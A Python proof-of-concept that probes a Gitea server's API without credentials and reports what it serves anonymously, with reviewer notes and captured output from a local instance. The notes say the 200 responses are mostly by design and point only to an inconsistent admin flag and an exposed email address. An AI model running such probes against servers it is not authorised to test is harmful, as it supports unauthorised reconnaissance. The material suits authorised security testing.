Gitea — unauthenticated API probe (claimed "insecure access control"; see the notes in the code before treating a 200 from these endpoints as a vulnerability)
import json
import sys

import requests
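def unauthenticated_poc(host="GIEA_URL", port=3000, *, scheme="http", timeout=5, session=None):
    """Probe a Gitea REST API without credentials and report what it serves anonymously.

    Issues an unauthenticated GET (no token, no cookie) against a fixed list of
    ``/api/v1`` endpoints, prints the status and the first 500 bytes of each body,
    and returns the raw results so a caller can inspect them programmatically.

    NOTE(review): a 200 from these particular endpoints is not, by itself, evidence
    of broken access control. ``settings/ui``, ``settings/api``, ``users/{name}`` and
    ``repos/search`` are served to anonymous clients by design in the Gitea releases
    this reviewer is aware of, scoped to public data -- confirm against the target
    version's API docs before reporting. It only becomes a finding if the anonymous
    view contains data that should require auth: a ``"private": true`` repository
    in the search results (checked below), or user fields the anonymous view is
    supposed to mask.

    Args:
        host: Hostname or IP of the Gitea server, without a scheme. The default is
            a placeholder, not a real host.
        port: TCP port of Gitea's HTTP listener.
        scheme: ``"http"`` (the value the original hard-coded) or ``"https"``.
        timeout: Per-request timeout in seconds.
        session: Object exposing ``get(url, headers=..., timeout=...)``, e.g. a
            ``requests.Session`` configured with a proxy or a custom CA bundle.
            Defaults to the ``requests`` module itself.

    Returns:
        dict mapping each probed path to ``(status_code, body_text)``; a path whose
        request raised is mapped to ``(None, error_message)``.
    """
    client = requests if session is None else session
    base = f"{scheme}://{host}:{port}/api/v1"
    paths = ("settings/ui", "settings/api", "users/root", "repos/search")
    headers = {"Accept": "application/json"}
    results = {}
    for path in paths:
        url = f"{base}/{path}"
        try:
            resp = client.get(url, headers=headers, timeout=timeout)
        except requests.RequestException as exc:
            # Narrowed from ``except Exception`` so bugs in this script surface
            # instead of being reported as a network error.
            print(f"[!] Error accessing {path}: {exc}")
            results[path] = (None, str(exc))
            continue
        print(f"[*] GET {path} → {resp.status_code}")
        results[path] = (resp.status_code, resp.text)
        if resp.status_code in (200, 401, 403):
            print(resp.text[:500])
            if path == "repos/search" and resp.status_code == 200:
                _report_private_repos(resp.text)
            print("-" * 60)
    return results


def _report_private_repos(body):
    """Print whether a ``repos/search`` body exposes private repositories anonymously.

    Anonymous search should only return public repos; any entry with
    ``"private": true`` is the concrete access-control evidence this PoC
    otherwise lacks. A non-JSON or unexpectedly shaped body is reported,
    not raised, so the probe keeps going.
    """
    try:
        repos = json.loads(body).get("data") or []
    except (ValueError, AttributeError):
        print("[!] repos/search body is not a JSON object; skipping private-repo check")
        return
    leaked = [r.get("full_name") for r in repos if isinstance(r, dict) and r.get("private")]
    if leaked:
        print(f"[!] {len(leaked)} private repo(s) visible without auth: {leaked}")
    else:
        print(f"[*] {len(repos)} repo(s) returned, all public (expected for anonymous search)")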
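if __name__ == "__main__":
    # Usage: python poc.py [host] [port]
    # Without arguments this falls back to the placeholder host and port 3000,
    # exactly as the original did.
    _argv = sys.argv[1:]
    unauthenticated_poc(
        _argv[0] if _argv else "GIEA_URL",
        int(_argv[1]) if len(_argv) > 1 else 3000,
    )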
# Captured output of a run, apparently against a local test instance (the
# avatar_url values point at localhost:3000). Points to weigh before treating
# this output as an access-control finding:
#   * repos/search returned a single repository with "private":false -- nothing
#     here shows anonymous access to non-public data.
#   * NOTE(review): the same user "root" is serialized two different ways.
#     users/root reports is_admin:false and a zero last_login, while the owner
#     object embedded in the repos/search result reports is_admin:true and a
#     real last_login. If the user endpoint masks those fields for anonymous
#     callers on purpose, the repo-owner serialization bypasses that masking;
#     this is the closest thing in the output to a real issue -- confirm
#     against the target Gitea version.
#   * email is returned in both responses. Whether an anonymous caller should
#     see it presumably depends on the account's email-privacy setting --
#     verify; and consider redacting it before publishing this gist.
'''
Response:
[*] GET settings/ui → 200
{"allowed_reactions":["+1","-1","laugh","hooray","confused","heart","rocket","eyes"]}
------------------------------------------------------------
[*] GET settings/api → 200
{"max_response_items":50,"default_paging_num":30,"default_git_trees_per_page":1000,"default_max_blob_size":10485760}
------------------------------------------------------------
[*] GET users/root → 200
{"id":1,"login":"root","full_name":"","email":"qiyuhou2@gmil.com","avatar_url":"http://localhost:3000/user/avatar/root/-1","language":"","is_admin":false,"last_login":"0001-01-01T00:00:00Z","created":"2025-04-28T01:46:43-07:00","username":"root"}
------------------------------------------------------------
[*] GET repos/search → 200
{"ok":true,"data":[{"id":1,"owner":{"id":1,"login":"root","full_name":"","email":"qiyuhou2@gmil.com","avatar_url":"http://localhost:3000/user/avatar/root/-1","language":"zh-CN","is_admin":true,"last_login":"2025-04-29T00:52:10-07:00","created":"2025-04-28T01:46:43-07:00","username":"root"},"name":"fuzzstring","full_name":"root/fuzzstring","description":"","empty":true,"private":false,"fork":false,"template":false,"parent":null,"mirror":false,"size":0,"html_url":"http://localhost:3000/root/fuzzst
------------------------------------------------------------
'''